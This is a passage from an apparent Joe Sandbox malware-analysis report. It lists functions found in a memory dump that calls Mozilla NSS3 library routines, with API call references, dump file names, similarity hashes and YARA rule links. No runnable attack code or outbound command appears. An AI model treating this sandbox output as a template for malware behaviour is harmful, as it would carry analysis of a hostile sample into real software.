Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6C6C9EBC), ref: 6C5B1FB8
SEC_ASN1EncodeItem_Util.NSS3(6C6C9E9C,?,?,6C6C9E9C), ref: 6C5B200A
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C5B2020

Part of subcall function 6C5A6A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C5AAD50,?,?), ref: 6C5A6A98

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5B2030

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
String ID:
API String ID: 1390266749-0
Opcode ID: 61798339646780c62c1fb2326b7b57553216e51e720878204763695422a7864c
Instruction ID: 8498682ead4a34a4bae9421bf3ffcdd61b1a0ac2b04ed7a37ce1df5485fa3b06
Opcode Fuzzy Hash: 61798339646780c62c1fb2326b7b57553216e51e720878204763695422a7864c
Instruction Fuzzy Hash: 3121E675A01605BBE7018A15DD50FAB7F68FF4631CF140615E828A6F80E731F929CBB6

Function 6C5A1DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C5A1E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C5A1E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5A1E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C5A1E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C5A1EAD

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: f29ae9ef6bf7bd6544ffecb4377e1737046da0bfa4d999af49920fcfc4b80d68
Instruction ID: a8d465e8c34b7a7fc9c1f927150f163e9dd38be1aaa66c4fb187bbb45b9932cb
Opcode Fuzzy Hash: f29ae9ef6bf7bd6544ffecb4377e1737046da0bfa4d999af49920fcfc4b80d68
Instruction Fuzzy Hash: 8321D372E08314E7D7008EAADC40B9FB7959BC5368F148638ED6957780E731DD0987D6

Function 6C6B1E40 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C6B1E5C

Part of subcall function 6C669BF0: TlsGetValue.KERNEL32(?,?,?,6C6B0A75), ref: 6C669C07

PR_Lock.NSS3(00000000), ref: 6C6B1E75
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C6B1EAB
PR_GetCurrentThread.NSS3 ref: 6C6B1ED0
PR_Unlock.NSS3(?), ref: 6C6B1EE8

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CurrentThread$ErrorLockUnlockValue
String ID:
API String ID: 121300776-0
Opcode ID: 8b5a62af3c1a591db03d3666225d843aee59499bafcd0b9dbb146cded2b14476
Instruction ID: bb85246114b0385dfa0648454ae5192b5604e56aaf8a90417c2d9e33d0699a41
Opcode Fuzzy Hash: 8b5a62af3c1a591db03d3666225d843aee59499bafcd0b9dbb146cded2b14476
Instruction Fuzzy Hash: 0421CC75B14612BBD700CF29D880A46B7B0FF85718B258229E819ABF40D730F823CBD9

Function 6C5FBE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C5AE708,00000000,00000000,00000004,00000000), ref: 6C5FBE6A

Part of subcall function 6C600840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6008B4

SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5B04DC,?), ref: 6C5FBE7E

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C5FBEC2
PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5B04DC,?,?), ref: 6C5FBED7
SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C5FBEEB

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
String ID:
API String ID: 1367977078-0
Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction ID: dc7c724c3f0934b328c5f142efdc6e301d0b509c960899da6fbaf04cb62f12f6
Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction Fuzzy Hash: 8611E276604205E7F708A965AC80F5773ADAB81798F044125FE2597B52E721D80A8EE1

Function 6C5AAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C5A3FFF,00000000,?,?,?,?,?,6C5A1A1C,00000000,00000000), ref: 6C5AADA7

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C5A3FFF,00000000,?,?,?,?,?,6C5A1A1C,00000000,00000000), ref: 6C5AADB4

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C5A3FFF,?,?,?,?,6C5A3FFF,00000000,?,?,?,?,?,6C5A1A1C,00000000), ref: 6C5AADD5

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C6C94B0,?,?,?,?,?,?,?,?,6C5A3FFF,00000000,?), ref: 6C5AADEC

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5A3FFF), ref: 6C5AAE3C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: f9d7b1d93d726d5852c1d03c10d6eb11a2ff678136469c3028d9b6d55afc0c49
Instruction ID: 7842cdc91dee4ae786e049574757e598cb413c8662e1eaf2297d2f24b4537a41
Opcode Fuzzy Hash: f9d7b1d93d726d5852c1d03c10d6eb11a2ff678136469c3028d9b6d55afc0c49
Instruction Fuzzy Hash: B8113B71E003049BE7109BA69C40BBF73F8DF9114DF044628FC5596B41FB20E9598AEA

Function 6C5B8FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C5C0710), ref: 6C5B8FF1
PR_CallOnce.NSS3(6C702158,6C5B9150,00000000,?,?,?,6C5B9138,?,6C5C0710), ref: 6C5B9029
calloc.MOZGLUE(00000001,00000000,?,?,6C5C0710), ref: 6C5B904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C5C0710), ref: 6C5B9066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C5C0710), ref: 6C5B9078

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: 65e0252dcba46f45fb44b13a48cf3169bdcf2f2b9d671f1e354fcd6f05235cda
Instruction ID: 5189429599179416810a2c6b11e6e8be646f973b1f1cdbcb0ec952ad1ea1a43a
Opcode Fuzzy Hash: 65e0252dcba46f45fb44b13a48cf3169bdcf2f2b9d671f1e354fcd6f05235cda
Instruction Fuzzy Hash: 8011447170016597E7205AAEAC54AB63ABCEBA27ACF100435FC48E2B80F772CD4483E5

Function 6C5CCD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C5E1E10: TlsGetValue.KERNEL32 ref: 6C5E1E36
Part of subcall function 6C5E1E10: EnterCriticalSection.KERNEL32(?,?,?,6C5BB1EE,2404110F,?,?), ref: 6C5E1E4B
Part of subcall function 6C5E1E10: PR_Unlock.NSS3 ref: 6C5E1E76

free.MOZGLUE(?,6C5CD079,00000000,00000001), ref: 6C5CCDA5
PK11_FreeSymKey.NSS3(?,6C5CD079,00000000,00000001), ref: 6C5CCDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C5CD079,00000000,00000001), ref: 6C5CCDCF
DeleteCriticalSection.KERNEL32(?,6C5CD079,00000000,00000001), ref: 6C5CCDE2
free.MOZGLUE(?), ref: 6C5CCDE9

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 5ba005ee117732768475093fa9083ae58f6e052f10f01a69e860cb8d9a698bd2
Instruction ID: 92995ee53465cc27c6cdbf4a41796961ac5647b2783ccddb88b4c2de79c07983
Opcode Fuzzy Hash: 5ba005ee117732768475093fa9083ae58f6e052f10f01a69e860cb8d9a698bd2
Instruction Fuzzy Hash: B711A0B2B01116BBEB00AFA5EC84996B77DFB44358B140125E91987E01E732F834C7E2

Function 6C603D90 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C6038A2), ref: 6C603DB0
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C6038A2), ref: 6C603DBF

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C6038A2), ref: 6C603DD9
_wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6C6038A2), ref: 6C603DE7
free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6C6038A2), ref: 6C603DF8

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
String ID:
API String ID: 1642359729-0
Opcode ID: e7c4c8249618feb7c3da03312e543b5a769f600f2a1eb58390e79c461d7e734b
Instruction ID: 6aaac80bbb529b0a29755d508bacbb83702a99f9fc52ba80e70af57338060b1c
Opcode Fuzzy Hash: e7c4c8249618feb7c3da03312e543b5a769f600f2a1eb58390e79c461d7e734b
Instruction Fuzzy Hash: 060142B17001223BFB2026762D49E3B3CADCB427A9B100235FC29EA680EA11CC0081F9

Function 6C632CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C635B40: PR_GetIdentitiesLayer.NSS3 ref: 6C635B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C632CEC

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_EnterMonitor.NSS3(?), ref: 6C632D02
PR_EnterMonitor.NSS3(?), ref: 6C632D1F
PR_ExitMonitor.NSS3(?), ref: 6C632D42
PR_ExitMonitor.NSS3(?), ref: 6C632D5B

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: ac0a24202a9a4cc6dc9623819cf481f1fa82a4299bba5dedfbb37272e6a793d0
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: A801A5B19042106BE6319F26FC40AC7B7E1EF4631CF006525E85E86B11D632E41587DB

Function 6C632D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C635B40: PR_GetIdentitiesLayer.NSS3 ref: 6C635B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C632D9C

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_EnterMonitor.NSS3(?), ref: 6C632DB2
PR_EnterMonitor.NSS3(?), ref: 6C632DCF
PR_ExitMonitor.NSS3(?), ref: 6C632DF2
PR_ExitMonitor.NSS3(?), ref: 6C632E0B

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 5bf6b78fe93105b06d3a02957be6d490b1dc58837aadca42626a3408921edab5
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 3701A5B19042106BE7309F26FC01BC7B7A1EF4231CF006435E85E86B11D632F41586DB

Function 6C5CAE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C5B3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5CAE42), ref: 6C5B30AA
Part of subcall function 6C5B3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5B30C7
Part of subcall function 6C5B3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5B30E5
Part of subcall function 6C5B3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5B3116
Part of subcall function 6C5B3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5B312B
Part of subcall function 6C5B3090: PK11_DestroyObject.NSS3(?,?), ref: 6C5B3154
Part of subcall function 6C5B3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C5A99FF,?,?,?,?,?,?,?,?,?,6C5A2D6B,?), ref: 6C5CAE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C5A99FF,?,?,?,?,?,?,?,?,?,6C5A2D6B,?), ref: 6C5CAE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C5A2D6B,?,?,00000000), ref: 6C5CAE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C5A2D6B,?,?,00000000), ref: 6C5CAE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C5A2D6B,?,?), ref: 6C5CAEA3

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: b0445357bf5afb89baad9211683fb84caf24a502e351e9813b0d142498677dd5
Instruction ID: d34026a13ad8800a7c7acfb78e6d8f77a2ada032536e9cd7fad2ad86370b83c9
Opcode Fuzzy Hash: b0445357bf5afb89baad9211683fb84caf24a502e351e9813b0d142498677dd5
Instruction Fuzzy Hash: 0601C876B4401097E701D2ACAC95AEF3D988BC765CF080939E905D7B41F625DD0A47F3

Function 6C6BBDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C6B7AFE,?,?,?,?,?,?,?,?,6C6B798A), ref: 6C6BBDC3
free.MOZGLUE(?,?,6C6B7AFE,?,?,?,?,?,?,?,?,6C6B798A), ref: 6C6BBDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C6B7AFE,?,?,?,?,?,?,?,?,6C6B798A), ref: 6C6BBDE9
free.MOZGLUE(?,00000000,00000000,?,6C6B7AFE,?,?,?,?,?,?,?,?,6C6B798A), ref: 6C6BBE21
free.MOZGLUE(00000000,00000000,?,6C6B7AFE,?,?,?,?,?,?,?,?,6C6B798A), ref: 6C6BBE32

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: 0899cfbc3fa4cab10636f0b245f5c638bcdf3a96bb097b1f041de03ef8e3e7ec
Instruction ID: 113b2ebc9d8f48413b2ea98e5e1366d20c959930d94081f234e39a78218acb26
Opcode Fuzzy Hash: 0899cfbc3fa4cab10636f0b245f5c638bcdf3a96bb097b1f041de03ef8e3e7ec
Instruction Fuzzy Hash: 5A1106F6B013009FDF51DF29D889B023BB5BB4A354B14007DE50A97710EB32A425CBA5

Function 6C603E10 Relevance: 7.5, APIs: 5, Instructions: 45memoryfileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,-00000001,?,00000000,?,6C603975), ref: 6C603E29
PORT_Alloc_Util.NSS3(00000000,?,00000000,?,6C603975), ref: 6C603E38

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,6C603975), ref: 6C603E52
DeleteFileW.KERNEL32(00000000), ref: 6C603E5D
free.MOZGLUE(00000000), ref: 6C603E64

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
